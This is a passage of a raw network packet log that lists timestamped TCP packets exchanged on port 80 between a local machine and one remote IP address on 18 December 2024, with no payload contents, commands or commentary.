                                                  Dec 18, 2024 14:07:40.508359909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.508392096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.509294987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.509428024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.509473085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.509957075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.510118008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.510163069 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.510821104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.565805912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.576535940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.576574087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.576679945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.576997995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.577097893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.577177048 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.577837944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.578016996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.578066111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.578723907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.578751087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.578797102 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.579602957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.579616070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.579652071 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.580363035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.580375910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.580431938 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.581156015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.581170082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.581208944 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.581876993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.582104921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.582153082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.582768917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.583005905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.583048105 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.583602905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.583615065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.583652020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.584353924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.584635019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.584677935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.585203886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.585484982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.585531950 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.586090088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.586112022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.586155891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.586837053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.586935043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.586982965 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.587729931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.587832928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.587877989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.588483095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.588556051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.588599920 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.589303017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.589479923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.589528084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.590199947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.590220928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.590269089 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.590953112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.591141939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.591187954 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.591866016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.591880083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.591923952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.592592955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.592937946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.592983961 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.593523026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.593760014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.593805075 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.594269991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.594393015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.594438076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.595196009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.595356941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.595410109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.595963955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.596086979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.596132040 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.596687078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.596942902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.596986055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.597649097 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.597671032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.597723007 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.598443031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.598515987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.598557949 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.599292994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.599654913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.599708080 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.600136995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.600361109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.600404978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.601035118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.601149082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.601198912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.601753950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.601810932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.601866961 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.602616072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.602629900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.602686882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.603368998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.603503942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.603550911 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.604221106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.604234934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.604271889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.604969978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.605041027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.605101109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.605907917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.605921030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.605967999 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.606667995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.606807947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.606934071 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.607507944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.607562065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.607619047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.608329058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.608460903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.608505964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.692564011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.692586899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.692631960 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.692861080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.692873955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.692914963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.693608046 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.694042921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.694055080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.694108009 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.694974899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.694997072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.695007086 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.695661068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.695698023 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.695765018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.696566105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.696578979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.696609974 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.697263956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.697302103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.697398901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.698393106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.698405981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.698429108 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.699167013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.699214935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.699395895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.700119019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.700130939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.700154066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.700984001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.701018095 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.701220989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.701802015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.701821089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.701842070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.702461958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.702486038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.702502966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.753298044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.768337965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.768351078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.768527985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.768605947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.768942118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.768982887 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.769452095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.769646883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.769692898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.770332098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.770445108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.770492077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.770876884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.770889997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.770945072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.771737099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.771766901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.771810055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.772608995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.772623062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.772666931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.773423910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.773436069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.773489952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.774207115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.774221897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.774262905 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.775029898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.775043011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.775088072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.776005983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.776019096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.776061058 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.776670933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.776684999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.776722908 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.777446032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.777564049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.777604103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.778374910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.778388023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.778428078 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.779206038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.779220104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.779267073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.780131102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.780251980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.780317068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.780832052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.780844927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.780886889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.781652927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.781765938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.781840086 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.782421112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.782624006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.782666922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.783379078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.783392906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.783448935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.784094095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.784244061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.784287930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.784979105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.785136938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.785291910 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.785761118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.785773039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.785834074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.786537886 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.786565065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.786604881 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.787355900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.787502050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.787542105 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.788577080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.788708925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.788750887 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.789390087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.789563894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.789603949 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.790292025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.790304899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.790344000 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.790915966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.790929079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.790961981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.791553974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.791567087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.791618109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.792395115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.792407036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.792440891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.793160915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.793365955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.793452978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.794107914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.794121027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.794159889 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.794848919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.794862032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.794899940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.795583010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.795994997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.796053886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.796436071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.796448946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.796487093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.797239065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.797693968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.797734022 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.798122883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.798135042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.798163891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.798991919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.799004078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.799050093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.799799919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.799813032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.799845934 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.800595045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.847054005 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.884402037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.884414911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.884464979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.884644985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.884666920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.884706020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.885503054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.885515928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.885564089 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.886303902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.886327982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.886380911 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.887100935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.887229919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.887284994 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.887980938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.887995005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.888031006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.888706923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.888817072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.888853073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.889677048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.889689922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.889724970 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.890408993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.890580893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.890618086 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.891347885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.891423941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.891463041 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.892024994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.892148018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.892184019 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.892827988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.893285990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.893323898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.893754005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.893775940 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.893809080 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.894577980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.894591093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.894646883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.960572958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.960602045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.960659027 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:40.960997105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:40.961307049 CET8049707176.113.115.178192.168.2.8
